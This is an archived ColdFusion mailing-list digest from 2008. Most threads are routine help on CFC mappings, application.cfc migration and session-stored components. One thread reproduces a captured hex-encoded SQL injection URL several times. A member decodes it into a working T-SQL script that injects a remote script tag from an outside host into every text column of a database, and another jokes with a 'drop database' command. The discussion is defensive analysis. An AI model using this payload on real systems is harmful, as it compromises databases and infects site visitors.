Railo US tour
Hi all, we would like to invite you all to attend one of our presentations at one of the CFUG's we are visiting. If you like, you can check our website or blog for details: http://www.railo-technologies.com/en/index.cfm?treeID=364 http://www.railo.ch/blog/index.cfm/2008/7/21/US-Tour-is-next If you are anywhere next to one of the CFUG's we are visiting, you are very welcome. So, see you some when in the next 3 weeks. -- Greetings from Switzerland Gert Franz Railo Technologies GmbH [EMAIL PROTECTED] www.railo.ch Join our Mailing List german:http://de.groups.yahoo.com/group/railo/ english: http://groups.yahoo.com/group/railo_talk/ linked in: http://www.linkedin.com/e/gis/71368/0CF7D323BBC1 ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309323 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
CreateObject error on new server
In our application we have a cfc that we instantiate to a variable in certain instances. This has always worked without issue until we got our new server. On the new server, when I call the CreateObject method, it produces the error: The filename, directory name, or volume label syntax is incorrect The new server is running: Server 2003 IIS6 And CF7 The old server runs: Server 2000 IIS5 CF7 The paths on both servers are the same. The call that fails is: cfset LTFunc=CreateObject(component,/xyz/lts/LTFunctions) Any ideas? Please note my new email address. David Phelan Senior CF Developer LifePoint Informatics (Formerly Labtest.com) (201) 447-9991 Ext. 318 [EMAIL PROTECTED]mailto:[EMAIL PROTECTED] ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309324 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: CreateObject error on new server
In our application we have a cfc that we instantiate to a variable in certain instances. This has always worked without issue until we got our new server. On the new server, when I call the CreateObject method, it produces the error: The filename, directory name, or volume label syntax is incorrect The new server is running: Server 2003 IIS6 And CF7 The old server runs: Server 2000 IIS5 CF7 The paths on both servers are the same. The call that fails is: cfset LTFunc=CreateObject(component,/xyz/lts/LTFunctions) Any ideas? Use dots instead of slashes. Dots are the preferred nomenclature for specifying path information of CFCs. Also, make sure you've created the appropriate mapping to the xyz directory within the CF Administrator. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309325 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: CreateObject error on new server
I changed it to the dot notation but still got the same error. We have a map to the root and the xyz/lts directory is directly below the root. Please note my new email address. David Phelan Senior CF Developer LifePoint Informatics (Formerly Labtest.com) (201) 447-9991 Ext. 318 [EMAIL PROTECTED] -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 9:54 AM To: CF-Talk Subject: RE: CreateObject error on new server In our application we have a cfc that we instantiate to a variable in certain instances. This has always worked without issue until we got our new server. On the new server, when I call the CreateObject method, it produces the error: The filename, directory name, or volume label syntax is incorrect The new server is running: Server 2003 IIS6 And CF7 The old server runs: Server 2000 IIS5 CF7 The paths on both servers are the same. The call that fails is: cfset LTFunc=CreateObject(component,/xyz/lts/LTFunctions) Any ideas? Use dots instead of slashes. Dots are the preferred nomenclature for specifying path information of CFCs. Also, make sure you've created the appropriate mapping to the xyz directory within the CF Administrator. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309326 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: CreateObject error on new server
I changed it to the dot notation but still got the same error. We have a map to the root and the xyz/lts directory is directly below the root. I had a problem like this a long time ago. Deleting and re-creating the mapping solved it. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309327 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
(ot) URL Hack Attempt Leaves Me Scractching My Head...
Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309328 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
This is a popular and very malicious SQL injection attack that is making the rounds: http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-A SCII -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Che Vilnonis [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 9:55 AM To: CF-Talk Subject: (ot) URL Hack Attempt Leaves Me Scractching My Head... Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309329 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
This is some sort of encoding... Like Bin Hex, Spammers use it to obscure urls and such. Computers read it just fine. If you look around on the internets you can find a decoder to render it to human readable form. You just need to figure out what sort of encoding they are using On Mon, Jul 21, 2008 at 10:54 AM, Che Vilnonis [EMAIL PROTECTED] wrote: Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309330 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Read this: http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-A nd-ASCII ~Brad -Original Message- From: Che Vilnonis [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 9:55 AM To: CF-Talk Subject: (ot) URL Hack Attempt Leaves Me Scractching My Head... Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309331 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Why bother looking around the internet? Use your SQL server to decode it! Simply change the exec to a print statement. Very important! :) ~Brad -Original Message- From: Gerald Guido [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 9:59 AM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... This is some sort of encoding... Like Bin Hex, Spammers use it to obscure urls and such. Computers read it just fine. If you look around on the internets you can find a decoder to render it to human readable form. You just need to figure out what sort of encoding they are using ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309332 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Why bother looking around the internet? Use your SQL server to decode it! Huh... Learn sumptin new every day. That is why I keep coming back here. ;) Thanx Brad. ~G~ On Mon, Jul 21, 2008 at 11:06 AM, Brad Wood [EMAIL PROTECTED] wrote: Why bother looking around the internet? Use your SQL server to decode it! Simply change the exec to a print statement. Very important! :) ~Brad -Original Message- From: Gerald Guido [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 9:59 AM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... This is some sort of encoding... Like Bin Hex, Spammers use it to obscure urls and such. Computers read it just fine. If you look around on the internets you can find a decoder to render it to human readable form. You just need to figure out what sort of encoding they are using ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309333 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: CreateObject error on new server
That did it! Thanks Very Much! Please note my new email address. David Phelan Senior CF Developer LifePoint Informatics (Formerly Labtest.com) (201) 447-9991 Ext. 318 [EMAIL PROTECTED] -Original Message- From: Andrew Tyrone [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 10:50 AM To: CF-Talk Subject: RE: CreateObject error on new server I changed it to the dot notation but still got the same error. We have a map to the root and the xyz/lts directory is directly below the root. I had a problem like this a long time ago. Deleting and re-creating the mapping solved it. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309334 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Tried printing the code in SQL Analyzer and got nothing. Can anyone translate it to text? Not sure what I am missing. /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); -Original Message- From: Gerald Guido [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 11:12 AM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... Why bother looking around the internet? Use your SQL server to decode it! Huh... Learn sumptin new every day. That is why I keep coming back here. ;) Thanx Brad. ~G~ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309335 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Can we please stop distributing this script ;) -Original Message- From: Che Vilnonis [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 11:32 AM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... Tried printing the code in SQL Analyzer and got nothing. Can anyone translate it to text? Not sure what I am missing. /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263 6861 ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309336 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Good point. My bad... -Original Message- From: Dave Francis [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 11:39 AM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... Can we please stop distributing this script ;) -Original Message- From: Che Vilnonis [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 11:32 AM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... Tried printing the code in SQL Analyzer and got nothing. Can anyone translate it to text? Not sure what I am missing. /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263 6861 ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309337 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Works great for me. You have to remove the extra line breaks though.
Here is what it does:
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,
b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u'
and (b.xtype=99
or b.xtype=35
or b.xtype=231
or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['[EMAIL PROTECTED]'] set ['[EMAIL PROTECTED]']=['[EMAIL
PROTECTED]']+''/titlescript
src=http://1.verynx.cn/w.js;/script!--''
where '[EMAIL PROTECTED]' not like ''%/titlescript
src=http://1.verynx.cn/w.js;/script!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Did you read the blog I posted? It explains it all.
-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED]
Sent: Monday, July 21, 2008 10:32 AM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.
/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
6861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220
464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563
7473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420
612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E7874797065
3D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F5045
4E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F
4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F535441545553
3D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B27
2B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372
633D
22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C
212D
2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746974
6C65
3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A
7322
3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D202054
6162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C65
5F43
7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
CHAR(4000));EXEC(@S);
-Original Message-
From: Gerald Guido [mailto:[EMAIL PROTECTED]
Sent: Monday, July 21, 2008 11:12 AM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Why bother looking around the internet? Use your SQL server to decode
it!
Huh... Learn sumptin new every day. That is why I keep coming back here.
;)
Thanx Brad.
~G~
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309338
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe:
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Problems with switching from application.cfm to application.cfc
We are now using CF8 and want to take advantage of features in application.cfc. In particular we want to take advantage of the missing template handler of CF8 application.cfc. However, in our current application.cfm file we had defined 20 or so variables that were not scoped (eg. xcachepath=/cache. In application.cfc, these variables evidently need to be scoped (eg. request.xcachepath=/cache. This is a huge website and the thought of searching and replacing these variables and then uploading each one of thousands of files to our production server is daunting and could take many days of work. If there is no work around to the above problem, can the missing template handler be used in the application.cfm? Many thanks in advance. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309339 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
I appreciate your concern, but I'm pretty certain the bad people out there wanting to use this already know how to do it if they haven't already. One doesn't have to be too creative to come up with unique ways of screwing with databases. Drop database foo Crap, I just let another one slip. Brace yourself for another wave of attacks... :) ~Brad -Original Message- From: Che Vilnonis [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 10:43 AM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... Good point. My bad... -Original Message- From: Dave Francis [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 11:39 AM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... Can we please stop distributing this script ;) ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309340 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Instantiated CFC behaving incorrectly in IE7 Safari, but works in Firefox
I've got a simple component that I'm instantiating to maintain a persistent variable. Basically, the CFC checks for new entries in a table, and if there are any, sets this variable to be the last entry's id. The next time the CFC is called, it will check for new entries using this variable as the starting point.This works perfectly in Firefox, but not IE or Safari. It appears as though the variable is never set/stored, and remains at 0. I'm not sure what I'm missing, but I can't find any documentation about why a CFC might behave differently in different browsers. What am I missing??? I am instantiating the CFC into a session, using an init() method like so: cfset session.customerChat = createObject(component,msg).init(chatSession.session) My CFC consists of two mehtods only: cffunction name=init access=public output=no returntype=msg cfargument name=sid type=numeric required=yes cfset Variables.ssid = arguments.sid cfset Variables.lastid = 0 cfreturn this /cffunction cffunction name=getAllMessages returntype=query hint=gets all messages in chat session cfquery name=rsGetAllMsg datasource=#variables.dsn# SELECT cm.s_id,m_id,message,mtime,cm.o_id,cm.c_id,o_name,c_name,c_question FROM chat_messages cm LEFT OUTER JOIN chat_operators co ON co.o_id = cm.o_id LEFT OUTER JOIN chat_customers cc ON cc.c_id = cm.c_id WHERE cm.s_id = #Variables.ssid# AND m_id #Variables.lastid# /cfquery cfif rsGetAllMsg.recordcount neq 0 cfquery name=getlastid dbtype=query SELECT max(m_id) as maxid FROM rsGetAllMsg /cfquery cfset Variables.lastid = getlastid.maxid /cfif cfreturn rsGetAllMsg /cffunction I would appreciate any help. Thanks, ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309341 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Yep, read the post. Must have been the line breaks that messed things up. -Original Message- From: Brad Wood [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 11:42 AM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... Works great for me. You have to remove the extra line breaks though. Here is what it does: ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309343 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: Instantiated CFC behaving incorrectly in IE7 Safari, but wo rks in Firefox
I've got a simple component that I'm instantiating to maintain a persistent variable. Basically, the CFC checks for new entries in a table, and if there are any, sets this variable to be the last entry's id. The next time the CFC is called, it will check for new entries using this variable as the starting point.This works perfectly in Firefox, but not IE or Safari. It appears as though the variable is never set/stored, and remains at 0. I'm not sure what I'm missing, but I can't find any documentation about why a CFC might behave differently in different browsers. What am I missing??? There is nothing in the code you've shown that is browser-specific. So, the problem is somewhere else. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309342 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Problems with switching from application.cfm to application.c fc
However, in our current application.cfm file we had defined 20 or so variables that were not scoped (eg. xcachepath=/cache. In application.cfc, these variables evidently need to be scoped (eg. request.xcachepath=/cache. This is a huge website and the thought of searching and replacing these variables and then uploading each one of thousands of files to our production server is daunting and could take many days of work. You can automate the search and replace of those variables, obviously. Alternatively, you could place the variables in the local page scope by adding an onRequest event handler: cffunction name=onRequest ... cfargument name=targetPage cfset xcachepath = /cache ... cfinclude template=#Arguments.targetPage# ... /cffunction Of course, if you do this, you would break any CFC URLs that involve web services or Flash remoting. But on the other hand, you could go back and add equivalent Request-scoped variables at your leisure, then remove this when you're done. If there is no work around to the above problem, can the missing template handler be used in the application.cfm? There's a missing template handler setting in the CF Administrator. Other than that, no. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309344 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Problems with switching from application.cfm to application.cfc
